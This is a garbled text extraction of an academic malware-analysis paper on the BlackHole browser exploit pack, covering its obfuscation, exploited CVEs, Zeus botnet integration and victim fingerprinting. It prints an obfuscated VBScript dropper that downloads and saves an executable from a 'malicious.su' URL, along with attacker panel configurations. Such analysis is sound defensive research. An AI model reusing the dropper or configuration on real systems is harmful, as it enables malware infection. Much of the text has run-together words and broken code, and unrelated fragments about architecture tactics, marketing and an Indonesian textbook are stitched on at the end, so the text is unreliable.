BROWSER EXPLOIT PACKS – EXPLOITATION TACTICS
BROWSER EXPLOIT PACKS – EXPLOITATION TACTICS SOOD & ENBODYBROWSER EXPLOIT PACKS– EXPLOITATION TACTICSAditya K Sood, Richard J. EnbodyDepartment of Computer Science andEngineering, Michigan State University, EastLansing, MI 48824-1226, USAEmail {soodadit, enbody}@cse.msu.eduABSTRACTBrowser exploit packs have been increasingly used forspreading malware. They use the browser as a medium toinfect users. This paper analyses the BlackHole exploit pack,and sheds light on the tactics used to distribute malware acrossthe web.INTRODUCTIONMalware infection is proliferating. In spite of new advancedprotection features, it has become difficult to protect againstinfections that happen through browsers. The rise of BrowserExploit Packs (BEPs) [1] plays a significant role in the successof malware infections. BEPs thrive by exploiting the browsers’vulnerabilities, and attackers have demonstrated a lot ofmaturity and expertise in developing their exploits. BEPs areusually used in conjunction with botnets and usedrive-by-download attacks to load the malware binary onto thevictim’s machine. Browser exploit packs such as Fragus,Fiesta, Yes, Crimepack, Phoenix, Red Dice, MPack, SPack,and Bleeding Life have demonstrated this kind of nefariousbehaviour. This work is a result of extensive analysis of theBlackHole BEP [2, 3], one of the most widely used BEPsbecause of its use with the Zeus and SpyEye botnets. In thispaper, we emphasize the following aspects: Analysis of the BlackHole Browser Exploit Pack. Code auditing of the BlackHole BEP in order to deriveexploitation and malware spreading techniques.Our basic premise is that it is crucial to analyse the sourcecode in order to understand the intrinsic behaviour of themalware when it is running. In this paper, we dissect thesource code to derive the exploitation methods used by theBlackHole BEP.BACKGROUND AND RELATED WORKNiel [4] described the basic exploit-based mechanisms in usein existing malware. Niel generalized web malwareconsidering the infections that are an outcome of third-partywidgets, advertisers, user-contributed content and web servervulnerabilities. Michael [5] has extended this work to showhow that malware is used to build botnets. In addition, a study[6] has been conducted to show how the malware exploits theOS components for malicious purposes and to investigate itsrepercussions. Further, some of the challenges in detectingbotnets [7] during crawling mechanisms have been discussedto analyse the impact of distributed botnets.In our study, we add to that work by explicitly looking intoBEPs to understand their design and the common tactics usedto infect the victims. We will present exploitation techniquesused to spread malware derived from static and dynamicanalysis of the BlackHole BEP.BROWSER DESIGN AGILITYDesign agility in the browser architectural model refers to therobust design of the browser components. Of course, no designis perfect, and every design has weaknesses that cannot beremoved completely. Such weaknesses can result invulnerabilities. A browser design can be considered weakbased on the following criteria: first, a weakness exists if aserious design flaw persists in the various components of thebrowser. Design error may lead to vulnerabilities that canundermine the security as well as the robustness of thebrowser. Second, a weakness exists if there is a possibility ofsubverting the extensible nature of browser components. Forexample, an open system design with customized code that isallowed to run inline with the software. That would include anopen set of APIs (Application Programming Interfaces) as wellas platform-independent code. It also covers the componentcodes that can be reprogrammed and reused effectively. Third,there may be security vulnerabilities in the browsercomponents that are most generic and stealthy.METHODOLOGYIn order to analyse the BlackHole BEP, we collected rawsamples from a variety of sources. We used the MalwareDomain List [8] and Clean MX [9] to find a number ofdomains that were hosting the BlackHole BEP. Figure 1 showsa sample list of the BlackHole BEP served by the MalwareDomain List. It took us close to three months to get theappropriate samples by analysing the malicious domains thatserve bots and browser exploit packs together. During thisprocess, we detected that live samples of the BlackHole BEPwere password protected. We applied techniques such as bruteforcing and social engineering in order to gain full access tothe BEP. However, this process was not easy because it washard to find the domains that were actually serving thismalware. Sometimes, we were not able to find the web pageseither because the BEP was removed or deleted. Wecontinuously monitored domains that were hosting theBlackHole BEP to track the changes so that the samplesneeded could be downloaded for analysis. Most of theanalytical tests were conducted with virtual machines in orderto maintain a controlled environment.In this experiment, we analysed the exploit pack code andaudited it completely to understand the exploitation techniquesused by the BlackHole BEP. Figure 1 shows the list of infecteddomains that show the presence of the BlackHole BEP.EXPERIMENT AND ANALYTICAL RESULTSDuring analysis, we found that BlackHole BEP files werescrambled and obfuscated. In general, the BlackHole BEP ishosted in conjunction with other botnets and uses PHP as abase to manage the framework. We present our analyticalresults in the following sections.BlackHole configurationThe BlackHole BEP displays a sophisticated design that lookslike a complete malware framework. For example, BlackHoleuses an AJAX-based environment to support different types ofVIRUS BULLETIN CONFERENCE OCTOBER 20111
BROWSER EXPLOIT PACKS – EXPLOITATION TACTICS SOOD & ENBODYFigure1: Malware Domain List – domains infected with the BlackHole BEP (registrant details obscured).widgets. Basically, the design allows every widget tocommunicate with the target independently and allowsautomatic updates. The widgets’ primary role is to keep trackof the information coming back from the infected machines.This information includes the browser types, operatingsystems and exploits that are vulnerable and have alreadybeen exploited. BlackHole also supports custom widgets forgathering statistical data. A global variable ‘time interval’ isdefined to refresh the information according to that interval.The BlackHole BEP is hosted on an XAMPP Apachedistribution because it is lightweight and easy to use.BlackHole is made of PHP, HTML and Jar files. PHP files areusually encrypted with an obfuscator. However, exploits arebasically programmed as inline scripts with PHP pages. Asthe PHP pages are accessed by a user, inline exploits arerendered as HTML and DOM content to drop maliciousexecutables by exploiting vulnerabilities in the browsercomponents or plug-ins. These HTML files primarily consistof exploitable browser code that generally uses JavaScript[BlackHole Configuration File] ? sqlSettings[‘dbHost’] ‘localhost’; sqlSettings[‘dbUsername’] ‘root’; sqlSettings[‘dbPassword’] ‘xxxxx’; sqlSettings[‘dbName’] ‘zain2’;heap spraying techniques. Listing 1 shows the configurationfile used by the BlackHole BEP. This file uses someinteresting metrics that control the working of the overallframework. For example, the ‘reuse iframe’ parameter isdefined for using the same iframe for serving exploits. Bydefault, each exploit in the BlackHole BEP is created in itsown iframe. The ‘exploit delay’ parameter is configured toset an appropriate time delay in serving the exploitsconsecutively. The ‘config url’ parameter is defined forspecifying the host address where the BlackHole panel ishosted. The ‘payload\ filename’ parameter uses a defaultpayload that is required to be included in every new exploit.The ‘enable signed’ parameter is applied to control thesigned Java applets which further require user interaction.Exploit obfuscation and encodingThe BlackHole BEP uses two different methods to obfuscateits PHP code. First, it uses ionCube [10], a standard PHPencoder, in order to encode all the PHP files as presented inListing 2. Table 1 shows the ionCube DLLs for different PHPversions that are used in encoding the BlackHole BEPframework. The ‘extension loaded’ function loads the ionCubedynamic library based on the information collected by the‘php uname’ and ‘phpversion’ functions. The ‘php uname’function is used to gather information about the operatingsystem on which PHP is running. The ‘phpversion’ functionreveals information about running PHP that is installed on the sqlSettings[‘tableVisitorsList’] ‘visitors list’; panel user “zain”; panel pass “xxxxx”; enable signed false; payload filename ‘payload.exe’; config url ‘http://malicious.com/bl2’; exploit delay 5000; reuse iframe false; ajax stats true; ajax delay 5000; ? Listing 1: BlackHole BEP – configuration file.2VIRUS BULLETIN CONFERENCE OCTOBER 2011 ?php if(!extension loaded(‘ionCube Loader’)){ oc strtolower(substr(php uname(),0,3)); ln ’/ioncube/ioncube loader ’. oc.’ ’.substr(phpversion(),0,3).(( oc ’win’)?’.dll’:’.so’); oid id realpath(ini get(‘extension dir’)); here dirname( FILE );if(strlen( id) 1&& id[1] ’:’){ id str replace(‘\\’,’/’,substr( id,2)); here str replace(‘\\’,’/’,substr( here,2));} rd str repeat(‘/.’,substr count( id,’/’)). here.’/’;.? Listing 2: ionCube encoder in the BlackHole BEP.
BROWSER EXPLOIT PACKS – EXPLOITATION TACTICS SOOD & ENBODYserver. ionCubeIoncube first collects the PHP version information anduses specific DLLs in order to encode the BlackHole BEP PHPfiles appropriately. With the use of the ionCube encoder, itbecomes really hard to analyse the BlackHole BEP.in the Java Open Business Engine (OBE) and Java workflowengine [13]. Since Java is platform independent, this flaw canbe exploited easily on any type of browser. In general, a thirdpart vulnerability (such as a Java plug-in) results in acompromise of all types of browsers running on differentoperating systems. As a result of this, the infection rate isquite high due to ease of exploiting these Java vulnerabilitiesas presented in Figure 2.SNoBlackHole BEP files1ioncube loader win 4.1.dll2ioncube loader win 4.2.dll3ioncube loader win 4.3.dllSNoYearExploit – CVEs4ioncube loader win 4.4.dll120105ioncube loader win 5.0.dll6ioncube loader win 5.1.dllCVE-2010-0188, CVE-2010-2884,CVE-2010-0842, CVE-2010-3552,CVE-2010-1297, CVE-2010-0840,CVE-2010-0806, CVE-2010-188522009CVE-2009-0927, able 1: ionCube DLL version specific to PHP version.Second, the BlackHole BEP also uses reverse encoding andconcatenation in generating remote objects in VBScript. Acode snippet present in Listing 3 shows that the BlackHoleBEP applies extensive reverse calls in order to make theanalysis somewhat harder.Table 2: Exploits served by the BlackHole BEP.The Java-OBE exploit discussed above is completelyundetectable by anti-virus engines and executes in a stealthymanner. In other ways, BlackHole uses a standardcryptographic function in conjunction with othercryptographic algorithms in order to make code analysisharder, as well as making it hard to detect by anti-virusengines and tools like Wepawet. The BlackHole exploit packalso uses helper files that result in detection of the softwareversion. The BlackHole BEP uses the ‘plugin detect.js’ scriptto fingerprint the available plug-ins in the victim browser.Apart from this, we also find �� and ‘JavaOBE.jar’ which support theexecution of Java exploits by collecting requisite informationfrom the victim browser. These helper files also provide thedefault environment required for triggering vulnerabilities.In Listing 3, the ‘:a’ parameter holds the value of the remoteaddress of the domain hosting the BlackHole BEP. TheStrReverse function is used to implement a normal trick incalling the code. When the code is rendered in the browser,‘tcejbOmetsySeliF.gnitpircS’ is treated as‘Scripting.FileSystemObject’ , ‘PTTHLMX.2LMXSM’ istreated as ‘MSXML2.XMLHTTP’ and ‘maertS.BDODA’ istreated as ADOBA.Stream. We decode the VBScript to getthis code. However, unwrapping the encoding layers providesbetter insight into the working of malicious VBScript code.This script pushes the operating system to run wmplayer.exeand realplayer.exe by calling the ‘Script.Shell’ object.Exploit distribution and infectionsBy performing continuous analysis and deobfuscation ofsample code, we found that the BlackHole BEP serves anumber of exploits for specific CVEs as presented in Table 2.After carefully analysing the exploit list, we find that theseexploits are the most reliable ones and their ratio ofsuccessful execution is high. Further, the most used exploitsin the BlackHole BEP are CVE-2010-0840 [11] andCVE-2010-0842 [12]. These vulnerabilities have been foundBotnets collaborationMost BEPs work collectively with botnets to spread infectionsacross the web. During our analysis, we found that theBlackHole BEP works effectively with the Zeus botnet, athird-generation banking malware. In this particular sample,Zeus works collaboratively with BlackHole, which shows thatthe BEP plays a critical role in determining the success ofw 3000:x 200 :y 1 :z false :a “http://malicious.su/f0d/bl2.php?i 3”:Set e rcS”)):b e.GetSpecialFolder(2) & “\exe.exe”:OT “GET”:Set c CreateObject(StrReverse(“PTTHLMX.2LMXSM”)):Set d CreateObject(StrReverse(“maertS.BDODA”))Set o rcS”))On Error resume nextc.open OT, a, z:c.send()If c.Status x Then u c.ResponseBody:d.Open:d.Type y:d.Write u:d.SaveToFile b:d.Close End eC eC “taskkill /F /IM pircSW”)).eXeC “taskkill /F /IM realplay.exe”:Set g o.GetFile(e.GetSpecialFolder(2) & “\” & StrReverse(“sbv.l”)):g.Delete:WScript.Sleep w :Set g o.GetFile(b) :g.DeleteListing 3: BlackHole BEP – reverse VBScript calls.VIRUS BULLETIN CONFERENCE OCTOBER 20113
BROWSER EXPLOIT PACKS – EXPLOITATION TACTICS SOOD & ENBODYFigure 2: Java exploits – high infection rate. DBHOST “localhost”; DBNAME “Zeus”; DBUSER “root”; DBPASS “pass”; ADMINPW “aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d”; //SHA-1 Hash from your password ACTIVATION PASSWORD “suckit”; BANTIME 86400; SOUND “Disabled”; COUNTRIES array(“RU” “ashrfwdogsfvxn.exe”, “DE” “ashrfwdogsfvxn.exe”, “US” “ashrfwdogsfvxn.exe”);Listing 4: BlackHole BEP configured with Zeus database.malware infection through botnets. The sampled domain washosting the BlackHole and Zeus panel together. Listing 4shows that the BlackHole BEP uses the Zeus database totrigger infections by retrieving specific details about the target.The BlackHole BEP also utilizes an anti-malware trackingsystem. Since the BlackHole BEP is designed as a fullmalware infection framework, it explicitly uses the concept ofblacklisting [14]. This technique is put in practice in order toprevent malware tracking. The attacker usually feeds theentries in the form of IP addresses which indicate unusualbehaviour. For example: if a security researcher is tracking amalicious domain, it is possible that the web server (malwaredomain) encounters consecutive requests for file downloads.Configuring the blacklists with that domain IP addressprevents the BlackHole BEP from serving exploits becausethe management system discards the HTTP request and nopositive response is sent back. ‘IP-Url-list.txt’ file is used inBlackHole to blacklist domains, as shown in Figure 3.periodically in all BEPs in order to derive statistics. TheBlackHole BEP uses the same GeoIP library. A brief codesnippet is presented in Listing 5 which shows how the BEPuses modular functions to fetch information related tocountries based on GeoIP location.Tracking infected systemsFurther, most BEPs will use a GeoIP location library to keeptrack of the infections occurring on a per country basis. It hasbeen shown that the MaxMind [15] free GNU library is used4VIRUS BULLETIN CONFERENCE OCTOBER 2011Figure 3: BlackHole BEP – blacklist implementation.
BROWSER EXPLOIT PACKS – EXPLOITATION TACTICS SOOD & ENBODYstrategies. In the next section, we willdiscuss some of the chosen exploit servingtechniques used by BEPs.function geoip country name by addr( gi, addr) {if ( gi- databaseType GEOIP CITY EDITION REV1) { record geoip record by addr( gi, addr);return record- country name;BEP TECHNIQUES} else {Exploit packs have the potential to stealinformation from users’ browsers byhooking different component interfacesand exploiting vulnerabilities in thevarious components. The followingtechniques have been incorporated in thebrowser exploit packs for spreadingmalware infection and bypassing anti-virusprotections. country id geoip country id by addr( gi, addr);if ( country id ! false) {return gi- GEOIP COUNTRY NAMES[ country id];}}return false;}function getdnsattributes ( l, ip){ r new Net DNS Resolver(); r- nameservers array(“ws1.maxmind.com”); p r- search( l.”.” . ip .”.s.maxmind.com”,”TXT”,”IN”); str is object( p- answer[0])? p- answer[0]- string():’’;ereg(“\”(.*)\””, str, regs); str regs[1];return str;}Listing 5: BlackHole BEP – MaxMind GeoIP stat functions. user agent SERVER[‘HTTP USER AGENT’]function getbrowserver(& MSIEversion, & OPERAversion) { uag SERVER[‘HTTP USER AGENT’];if ( strstr( uag, “Firefox” ) ) {if ( preg match( “#Firefox/(\\d \\.?\\d*\\.?\\d*)#s”, uag, mt ) ) {return “Firefox v{ mt[1]}”; }return “Firefox”; }.function getbrowsertype( ) { uag SERVER[‘HTTP USER AGENT’];if ( strstr( uag, “Opera” ) ) { return “Opera”; }if ( strstr( uag, “Firefox” ) ) {return “Firefox”; }if ( strstr( uag, “MSIE” ) ) { return “MSIE”; }return “Other”;}Listing 6: UAF and exploit serving by the BlackHole BEP.The BlackHole BEP uses an advanced Traffic DistributionSystem (TDS) to handle data from various parts of the world.Once the location of the victim is determined, informationabout various metrics such as IP address, location, country,successful hits and malware downloads is collected. The TDSplays a crucial role in managing data from various sources.BlackHole uses a traffic redirection script that is visited byevery infected system through HTTP. Different types of rulesare configured for segregating data based on the geographicallocations (IP addresses). As discussed earlier, widgets are usedexplicitly in BlackHole. Generally, widgets are designed tomanage incoming data by separating them into desired metrics(IP addresses, country, hits, etc.) that are configured in theadmin panel. Primary and secondary rules are defined to handletraffic data by redirecting the visitors to appropriate widgets.After understanding the details of the BlackHole BEP, wecategorized the information gathering and exploit techniques.This process is followed in order to generalize the infectionUser Agent Fingerprinting (UAF)User agents are defined as the clientapplications that are used to send HTTPrequests to the server. In general, useragents implement the network protocolthat is required for client-servercommunication. From a wider perspective,the user agent parameter (request header)in the HTTP request carries informationabout the browser environment. The useragent parameter provides informationregarding the type of browser, theoperating system and the security model.As stated in RFC 2616 [16], user agentstrings are meant for statistical purposes.Concurrent with the rise of infectionsbased on BEPs, user agent fingerprinting isalso proliferating. BEP writers areexploiting the functionality of the useragent because it transmits informationfrom the victim machine to the destination.For example: the user agent transmitsinformation as
Engineering, Michigan State University, East Lansing, MI 48824-1226, USA Email {soodadit, enbody}@cse.msu.edu ABSTRACT Browser exploit packs have been increasingly used for spreading malware. They use the browser as a medium to infect users. This paper analyses the BlackHole exploit pack, and sheds light on the tactics used to distribute .
1.1 Using Tactics in Practice 2 2 Tactics for Availability 5 2.1 Updating the Tactics Catalog 6 2.2 Fault Detection Tactics 6 2.3 Fault Recovery Tactics 10 2.4 Fault Prevention Tactics 16 3 An Example 19 3.1 The Availability Model 19 3.2 The Resulting Redundancy Tactic 21 3.3 Tactics Guide Architectural Decisions 22 .
Cognos Viewers: Browser Version Apple Safari 9, 10, 11, and future fix packs Apple Safari on iOS 12.x and future fix packs Google Chrome (latest release) and future fix packs Microsoft Edge 44 and future fix packs Microsoft Edge Chromium Any Version and future fix packs Microsoft Internet Explorer 11 and future fix packs
tactics and discuss the range of tactics identified by research, as well as their effects on various outcomes. Impression management tactics Research has identified a range of IM tactics and has found several ways to classify these tactics. The simplest distinction views IM tactics as either verbal or non-verbal (Schneider, 1981).
ADHOME HVAC MARKETING FUNNEL AWARENESS INTEREST CONSIDERATION INTENT EVALUATION PURCHASE DESCRIPTION MARKETING TACTICS MARKETING TACTICS MARKETING TACTICS MARKETING TACTICS MARKETING TACTICS MARKETING TACTICS DESCRIPTION DESCRIPTION DESCRIPTION DESCRIPTION DESCRIPTION Someone in this stage is hearing about your brand for the first time. They .
Mobile Strategy. 6. Browser Specific Configurations. 6. Apple Safari Browser Configurations. 6. Google Chrome Browser Configurations. 7. Microsoft Edge Chromium-Based Browser Configurations. 8. Microsoft Edge HTML-Based Browser Configurations. 9. Microsoft Internet Explorer \(IE\) Browser Configurations. 9. Mozilla Firefox Browser .
Enterprise Browser Application And Configuration Version Comparision - From Enterprise Browser 1.8 and above, Enterprise Browser Application and Configuration version comparison is now gets captured at Enterprise Browser log file. [Show Enterprise Browser 1.7 Release Information] [Show Enterprise Browser 1.6 Release Information]
Service Packs When importing service packs, you need to import only the most recent service pack. Later service packs always include previous service packs. Therefore, for example, if you want to upgrade to Service Pack 3, you do not need to import Service Packs 1 and 2 first, as these are included in Service Pack 3. 20
pihak di bawah koordinasi Kementerian Pendidikan dan Kebudayaan, dan dipergunakan dalam tahap awal penerapan Kurikulum 2013. Buku ini merupakan “dokumen hidup” yang senantiasa diperbaiki, diperbaharui, dan dimutakhirkan sesuai dengan dinamika kebutuhan dan perubahan zaman. Masukan dari berbagai kalangan diharapkan dapat meningkatkan kualitas buku ini. Kontributor Naskah : Suyono . Penelaah .
